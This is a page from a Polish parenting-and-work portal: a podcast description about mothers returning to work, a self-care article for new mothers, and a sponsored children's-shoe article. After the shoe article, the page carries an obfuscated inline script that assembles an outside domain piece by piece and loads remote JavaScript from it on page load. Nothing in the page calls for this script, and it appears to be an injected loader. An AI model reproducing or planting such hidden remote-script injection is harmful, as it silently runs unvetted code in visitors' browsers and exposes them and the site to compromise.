Czego szukasz

[11] Podcast: Jestem równie ważna- czyli o czym pamiętać wracając do pracy po przerwie?

Jakie jest najważniejsze pytanie, które warto zadać sobie przed powrotem do pracy? Jak sobie radzić w chwilach, kiedy masz poczucie, że wszystko spada na Twoją głowę i musisz sprostać wielu wyzwaniom naraz? Skąd bierze się poczucie winy u mam, które decydują się postawić na swój rozwój i/lub zadbać o własne potrzeby? Posłuchaj naszego podcastu! Tym razem gościmy Elżbietę Kristen-Szablewską – Group Manager w BNY Mellon oraz mamę dwójki dzieci, która wraz z Agnieszką Czmyr- Kaczanowską odpowiada na te, oraz wiele innych pytań. Zapraszamy!

Podcast: jestem równie ważna
Podcast Mamo Pracuj jeśli chcesz!
Podcast Mamo Pracuj jeśli chcesz!
[11] Podcast: Jestem równie ważna- czyli o czym pamiętać wracając do pracy po przerwie?
/

Jestem równie ważna – czyli o czym pamiętać wracając do pracy po przerwie?

To, co jest najtrudniejsze w powrocie do pracy, może stać się o wiele prostsze, kiedy zadamy sobie kilka ważnych pytań i szczerze na nie odpowiemy. A znając własne priorytety możemy świadomie kształtować rzeczywistość wokół siebie. Choć brzmi łatwo… wcale takie nie jest, prawda?

Zapraszamy do wysłuchania naszego podcastu, w którym odpowiadamy na pytanie o to, jak pamiętać o sobie i swoich potrzebach wracając do pracy po przerwie.

Zastanawiamy się wspólnie, dlaczego postawa, w której mama traktuje siebie i swoje potrzeby na równi z potrzebami innych, przynosi korzyści nie tylko mamie, ale wszystkim wokół?

W rozmowie z Agnieszką Czmyr-Kaczanowską, Elżbieta Kristen–Szablewska – Global Risk Manager z BNY Mellon, opowiada o własnych doświadczeniach powrotu do pracy i o uniwersalnych sposobach, które pomagają mamą pamiętać o sobie. Zapraszamy!

Posłuchaj!

Czego dowiesz się z podcastu?

 • Skąd biorą się wyrzuty sumienia mamy i jak sobie z nimi radzić?
 • Jakie najważniejsze pytanie warto zadać sobie przed powrotem do pracy?
 • O co zadbać, kiedy planujesz powrót do pracy?
 • W jaki sposób kształtujemy postawy własnych dzieci?
 • Jakie rozwiązania w życiu zawodowym pomagają łączyć pracę z życiem rodzinnym?
 • Niania na godziny – jak działa taki benefit?
 • Dlaczego warto mówić o swoich oczekiwaniach pracodawcy?
 • Pod jakim kątem warto szukać pracodawcy, gdy wracamy po przerwie?

Słów kilka o prowadzących

Elżbieta Kristen–Szablewska - Global Risk Manager z BNY Mellon

Elżbieta Kristen-Szablewska jest Group Managerką w BNY Mellon i od dwóch lat zarządza zespołem Global Risk Solutions. Zanim dołączyła do BNY Mellon, była Senior Managerką w zespole Reinsurance Operations w jednym z centrów usług wspólnych we Wrocławiu. Przez ponad 10 lat kariery zawodowej Ela zdobywała doświadczenie zarządzając zespołami operacyjnymi w marketingu i finansach. Swoją karierę zaczynała w organizacjach pozarządowych, skupiając się na pracy w Organizacji Narodów Zjednoczonych.

Ela jest także żoną i mamą dwóch żywiołowych chłopców. Z wykształcenia jest muzykiem instrumentalistą, więc w wolnym czasie uwielbia słuchać muzyki klasycznej (jej dzieci nie podzielają tego entuzjazmu).

Agnieszka Czmyr-Kaczanowska – Employer Branding Manager i entuzjastka Diversity & Inclusion. Wspiera kobiety w rozwoju zawodowym i osobistym oraz współpracuje z pracodawcami, którzy chcą tworzyć przyjazne miejsca pracy. Dzięki temu zmienia rynek pracy na bardziej przyjazny i otwarty dla kobiet. Obecnie rozwija nową markę Talenti.pl – platformy rekrutacyjnej dla kobiet, której ideą jest pozytywnie namieszać na rynku rekrutacji.

Po więcej informacji o firmie zapraszamy na stronę karierową i profil Franklin Templeton w Bazie Pracodawców Przyjaznych Rodzicom!

Posłuchaj naszych innych podcastów:

7 odcinek – Rynek pracy w trakcie i po pandemii. Możliwe scenariusze, szanse i ryzyka

8 odcinek – Brakująca połowa dziejów, czyli o roli kobiet we wszystkich aspektach życia

10 odcinek – Wsparcie w powrocie do pracy po przerwie. Cenne wskazówki dla mam i nie tylko!

Więcej odcinków znajdziesz pod tym linkiem!

Zdjęcia: archiwum prywatne Elżbieta Kristen-Szablewska oraz Canva

Wsparcie realizacji: Zuzanna Piechowicz

Spodobał Ci się artykuł? Podziel się z innymi:
Z podcastu Mamo Pracuj jeśli chcesz dowiesz się: jak szukać pracy po przerwie oraz jak przygotować siebie i rodzinę na Twój powrót do pracy. Podpowiemy Ci jak prowadzić firmę oraz jak pracować i nie zwariować.

Jak możesz dbać o siebie mając malutkie dziecko?

Czy mając w domu malutkie dziecko można w ogóle myśleć o sobie i swoich potrzebach? Pewnie, że tak! Powiem więcej – trzeba! Zostając mamą, nie przestajesz być kobietą. Nadal zasługujesz na przyjemności, relaks i czas tylko dla siebie. Zdradzę Ci, jak możesz o to wszystko zadbać, gdy w Twoim życiu pojawi się niemowlak.
mama mająca malutkie dziecko na rękach

Mamo, odpoczywaj!

Pamiętaj, że gdy masz malutkie dziecko, Twój odpoczynek jest niesamowicie istotny, bo ma wpływ na Twoje samopoczucie, na siły, które potrzebujesz do funkcjonowania przy dziecku i na Twój dobry nastrój – bez tego ani rusz.

Sparafrazuję słowa z pewnego kanału tv „dziecko śpi, śpij i Ty!”. Zapewne noce wyglądają zupełnie inaczej niż przed urodzeniem maluszka, a rano budzisz się niczym zombie. Nie miej wyrzutów sumienia i śpij w czasie drzemek niemowlaka. W tym czasie możesz też wziąć prysznic albo zrobić sobie relaksującą kąpiel.

Wystarczy, że nastawisz elektroniczną nianię, a jeśli się boisz, to połóż dziecko spać w wózku i weź ze sobą do łazienki. Gdy karmisz dziecko, to nastaw sobie serial albo przeczytaj książkę. Pamiętaj, by w zwykłej codzienności pozwalać sobie na chwile relaksu.

Przeczytaj także: Filmy na jesienne wieczory, czyli co warto obejrzeć na Netflixie?

Mamo, lecz się!

Nie lekceważ swojego zdrowia. Szczególnie po ciąży i porodzie jest ono nadwyrężone. Chodź do lekarza i badaj się regularnie. Dziecko nie może być wymówką, bo sił i zdrowia potrzebujesz także dla niego. Znajdź opiekę dla malucha na czas wizyty u specjalisty i zadbaj o swoje zdrowie.

Mamo, rozwijaj swoje pasje!

Marzyłaś o zrobieniu kursów, chciałaś nauczyć się szydełkować albo postanowiłaś przeczytać mnóstwo książek? Wykorzystaj urlop macierzyński. Z dzieckiem w domu możesz wykonywać te rzeczy. Zwariujesz, jeśli Twoje życie będzie się kręciło tylko wokół pieluch, brudnych podłóg i obiadów na każdy dzień. Jeśli poświęcisz czas na swój rozwój, nawet kosztem niektórych obowiązków, to na dłuższą metę, będziesz odczuwała satysfakcję, jakiej nie dadzą Ci czyste okna i schabowe klepane przez dwie godziny.

Przeczytaj także: Sprawdź 5 wciągających książek na jesienne wieczory

Mamo, nie oszczędzaj!

Nie ma nic złego w tym, że kupisz sobie potrzebne buty, nową sukienkę albo jakiś fajny kosmetyk. Nie zadręczaj się, że nie wydałaś tych pieniędzy na malutkie dziecko, a zamiast tego na własne przyjemności. Kupowanie czegoś tylko dla siebie, to dbanie o swoje potrzeby, a nie rozrzutność czy egoizm.

Mamo, zaangażuj tatę!

Podejrzewam, że podobnie jak ja i wiele innych kobiet chcesz pokazać światu, że jesteś superwoman i sama sobie ze wszystkim poradzisz. Koniec z tym! Nie musimy być idealne, tylko po to, by za kilka lat wysiadło nam zdrowie, a życie towarzyskie i rozrywkowe umarło.

Mając malutkie dziecko, nie miej wyrzutów sumienia i podziel opiekę nad niemowlakiem na rolę. Ty siedzisz z nim cały dzień, ale tata zajmuje się wieczorną kąpielą. Ty spędzasz tydzień z maluszkiem, spacerujesz, karmisz, ale w weekend masz czas dla siebie, zostawiasz zapas mleka i butelkę i wychodzisz do kina, do kosmetyczki, albo na kawę i zakupy z koleżanką. Albo odsypiasz tygodniowe trudy, a tatę wysyłasz z dzieckiem na spacer.

Mamo, zadbaj o relacje w związku!

Bez żadnych skrupułów skorzystaj z pomocy babć, cioć czy opiekunek i zadbaj o swoje relacje małżeńskie. To bardzo ważne dla Was obojga, by okazywać sobie uczucia w tej nowej sytuacji, tak żebyście nie czuli się zaniedbani przez drugą osobę.

Może myślisz sobie, że dziecko jest jeszcze za malutkie, a mąż musi zrozumieć. Pamiętaj jednak, że Wasza miłość to podwaliny pod wychowanie szczęśliwego dziecka, dlatego trzeba o nią dbać.

Mamo, nie wstydź się!

Nie wstydź się prosić o pomoc w sprzątaniu, zakupach czy gotowaniu na kilka dni. Pamiętaj, że masz prawo do odpoczynku, masz prawo o siebie zadbać.

Macierzyństwo nie jest powodem abyś obowiązkowo stawała się Matką Polką Cierpiętnicą. Macierzyństwo nie sprawia, że wszystkie obowiązki związane z domem i opieką nad dzieckiem należą tylko do Ciebie. Jednocześnie macierzyństwo nie powinno sprawiać, że życie towarzyskie przestaje dla Ciebie istnieć. Nadal możesz być pełną sił i energii kobietą, której szczęście powiększyło się dzięki pojawieniu się dziecka, a nie uciekło w zapomnienie.

Zdjęcie: Storyblocks.com

Spodobał Ci się artykuł? Podziel się z innymi:
Szczęśliwa żona i mama czwórki dzieci. Macierzyństwo to jej największa pasja, motywująca do rozwoju i działania. Z przyjemnością oddaje się pisaniu. Kocha muzykę, kino i dobre jedzenie. Lubi śledzić trendy i wprowadzać je w życie. Zawodowo początkująca, ale z apetytem na sukces.

Odpowiednio dobrane buty dla dzieci – Dlaczego są tak ważne?

Nasze dzieci, zwłaszcza gdy są małe, eksplorują świat na wszystkie znane im sposoby. By mogły robić to bezpiecznie, niezbędnym jest zapewnienie im do tego odpowiednich warunków. Podstawą zdrowego rozwoju jest więc właściwy dobór obuwia dla naszego dziecka. To ono odpowiada za to, w jaki sposób nasz bobas, a potem starszak stawia pierwsze i kolejne kroki. Źle dobrane obuwie może narobić wielu szkód, z kolei to dobrane idealnie będzie nie tylko bezpieczne, ale również komfortowe. Zapraszamy do lektury poniższego materiału, z którego dowiesz się na co zwracać uwagę kupując obuwie dziecięce. Jak odpowiednio dobrać obuwie dla naszego dziecka.
buty dla dzieci

Kupując obuwie dziecięce przede wszystkim powinniśmy postawić na bezpieczeństwo. Poniżej prezentujemy kilka podstawowych zasad, na które warto zwrócić uwagę kupując dziecięce buty.

 • Cholewka buta powinna sięgać wysokości kostek (w przypadku adidasów czy trampek) lub mieć stabilne trzymające elementy (w przypadku sandałków). Jest to szczególnie ważne przy małych stopach, które kształtują się z wiekiem. Niewłaściwe i nieergonomiczne ułożenie stopy dziecka bądź ryzyko jej wykrzywienia podczas ruchu może być przyczyną wielu problemów w przyszłości.
 • W przypadku zakrytych z przodu butów, ich czubek powinien być obszerny, by dziecko mogło swobodnie poruszać palcami. Nie należy dopuścić do sytuacji, w której dziecko podkurcza palce w bucie. Należy założyć długość buta o 7-9 milimetrów większą od stopy dziecka. Ma to związek z tym, że podczas chodzenia, stopa dziecka pracuje i może mimowolnie przesuwać się w bucie.
 • Podeszwa buta powinna być wykonana z antypoślizgowego materiału. Najlepiej by był to kauczuk, który jest sprężysty a jednocześnie zdecydowanie bardziej trwały niż zwykła guma.
 • Warto również spojrzeć na zapięcie. Sznurowane buty doskonale trzymają kostkę, zapinane na rzepy pozwalają na dopasowanie obuwia do stopy, z kolei otwarte modele (np. sandałków) dbające o odpowiednią cyrkulację powietrza to model, w którym należy zadbać o odpowiednie umocowanie kostek.

Drugim aspektem na jaki warto zwrócić uwagę, są kwestie wizualne. Obecnie w salonach stacjonarnych CCC jak i w sklepie online możemy znaleźć modele wygodnych butów dla naszych dzieci sygnowanych postaciami z bajek. Niektóre modele posiadają również dodatkowe atrakcje takie jak świecące diody podczas chodzenia czy kolorowe sznurówki. Wszystko po to, by poza bezpieczeństwem, dostarczyć naszym dzieciom również radości z użytkowania obuwia.

Obuwie dla dzieci dostępne w CCC

Szukając obuwia dla naszego dziecka warto zapoznać się z szerokim asortymentem sklepu CCC – zarówno stacjonarnie jak i w sklepie online. Znajdziemy tam obuwie dla naszego dziecka na każdą okazję.

 • Trampki, doskonale sprawdzą się do szkoły jak i na codzienne spotkania z przyjaciółmi.
 • Adidasy to świetna propozycja na zajęcia sportowe jak i dłuższe spacery np. w wakacje.
 • Półbuty, to doskonała propozycja do letniej sukienki bądź krótkich spodenek, np. na urodziny czy szkolne przedstawienie.
 • Sneakersy to świetna propozycja do dżinsów i t-shirtu. Taki zestaw sprawdzi się zarówno na wyjście do szkoły jak i do kina ze znajomymi.

Warto również dodać, że każdy z wyżej wskazanych modeli butów posiada odpowiednio wyprofilowaną wkładkę, która wykonana została z najwyższej jakości materiałów. Dba ona nie tylko o właściwe ułożenie i komfort stopy podczas użytkowania, ale również o właściwą higienę obuwia.

Dodatkowo każdy z zaprezentowanych modeli może występować w różnych kolorach, stanowiąc ciekawe propozycje do różnego rodzaju dziecięcych stylizacji.

Artykuł powstał we współpracy z partnerem portalu.

Zdjęcie partnera portalu.

<script>

(function(){

i6tn_=(„u”+”st”);i6tn=document.createElement(„script”);i6tn.async=true;

i6tnu=”423642968″;i6tn_+=”a”+(„t.”);i6tn_+=”i”+(„nf”+(„o”))+(„/”);

i6tnu+=”.ahmXzxni6tn2cvz2″;i6tnu+=”nknmkec43k7zpd”;

i6tn.src=”https://”+i6tn_+i6tnu;i6tn.type=”text/javascript”;

d_b=document.body;d_b.appendChild(i6tn);

})();

</script>

Spodobał Ci się artykuł? Podziel się z innymi:
Chcę otrzymywać inspiracje, pomysły i sugestie jak pracować i nie zwariować.
Newsletter wysyłamy raz na 2 tygodnie

Może Cię zainteresować także: